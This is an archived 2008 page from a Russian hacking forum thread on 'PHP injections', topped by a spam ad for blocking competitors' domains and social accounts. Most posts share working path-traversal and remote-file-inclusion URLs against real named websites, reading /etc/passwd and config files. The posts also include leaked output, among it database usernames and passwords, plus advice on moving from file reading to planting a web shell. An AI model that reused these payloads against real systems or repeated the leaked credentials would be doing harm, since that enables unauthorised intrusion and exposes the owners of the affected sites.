УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
PHP Иньекции

Страница 73 из 116

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#721

18.06.2008, 08:34

#urbaner

Новичок

Регистрация: 30.03.2008

Сообщений: 19

Провел на форуме:
95226

Репутация: 10

Отправить сообщение для #urbaner с помощью ICQ

Цитата:

http://www.indianstudios.net/rotterdamfilmfestival.php?id=[INCLUDE]

Вот вроде иньекция.

#722

19.06.2008, 16:49

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

Цитата:

Сообщение от #urbaner

Вот вроде иньекция.

нету иньекции тут мистер

#723

24.06.2008, 17:23

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

Провел на форуме:
2808062

Репутация: 155

www.iauneka.ac.ir

Код:

http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/passwd
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/hosts
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/services
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/group
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/profile
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/inputrc
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/bashrc
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/skel/.bashrc

#724

25.06.2008, 15:01

DJ ][akep

Познающий

Регистрация: 27.01.2008

Сообщений: 57

Провел на форуме:
355954

Репутация: 32

Цитата:

Сообщение от Ch3ck

_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f =../

А лучше сюда и шела ненадо полный рут

http://www.postnuke.ru/index.php?module=Static_Docs&func=view&f=../../../../../../../../../../../../../../

#725

27.06.2008, 09:10

FraiDex

Участник форума

Регистрация: 16.06.2006

Сообщений: 179

Провел на форуме:
515368

Репутация: 135

Отправить сообщение для FraiDex с помощью ICQ

http://www.kasseler-cms.net/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd

#726

27.06.2008, 12:44

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

Провел на форуме:
2808062

Репутация: 155

PR 5

Код:

http://www.socialweb.be/nl/archieven/index.php?File=../../../../../../../../../../../etc/passwd%00

#727

27.06.2008, 15:48

Fluxoid

Новичок

Регистрация: 12.06.2008

Сообщений: 8

Провел на форуме:
119585

Репутация: 12

Код:

http://www.serviceformulaire.fr/html/menu.phtml?page=[INCLUDE]
http://iron-brigade.org/btech/html/page.php?fichier=[INCLUDE]
http://bagowei.free.fr/_php/contener.php?path=..%2F..%2F&file=[INCLUDE]&title=Bagowei

remote including

#728

28.06.2008, 00:58

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

Цитата:

Сообщение от Naydav

под сотню юзеров , а каждый юзер, возможно - "сайт"
только толку...

а толк от инклуда есть... можно читать файлы.. следовательно можно читать конфиги.. отсюда моожно получить путь до домашних каталогов этих сайтов, потом поискать дыры и в конце концов залить на это чертов сервер шел... а там уже твори что твой душе угодно=)

#729

28.06.2008, 02:08

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Отправить сообщение для b3 с помощью ICQ

1) http://www.ejls.eu/download.php?file=../etc/passwd

Цитата:

root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0

perator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:

Сколько не мучался пути к конфигам ненашел, пути брал отсюда:
https://forum.antichat.ru/thread49775.html

2) http://www.jff.org/download.php?file=../index.php

Цитата:

$hostname_JFF = "localhost";
$database_JFF = "jff_content";
$username_JFF = "jff_contentReade";
$password_JFF = "^&%623kjlfsdf_$43";

Цитата:

<?php
function connectToDatabase() {
$dbh=mysql_connect ("localhost", "helpuc_helpuc2hu", "xd1iqXSO9m")
or die ('I cannot connect to the database because: ' . mysql_error());
mysql_select_db ("helpuc_helpuc2helpuconnect");
}
function query ($sql)
{
$query_result=mysql_query($sql) or die("Couldn't execute following query:<b>".$sql."</b> because of".mysql_error());
if (!$query_result) return (0);
$out=array();
// if (mysql_num_rows($query_result)>1) {
while ($value=@mysql_fetch_array($query_result,MYSQL_ASS OC)) $out[]=$value;
//} else $out=@mysql_fetch_array($query_result,MYSQL_ASSOC) ;
if (count ($out)>=1) return ($out);else return $query_result;

}
?>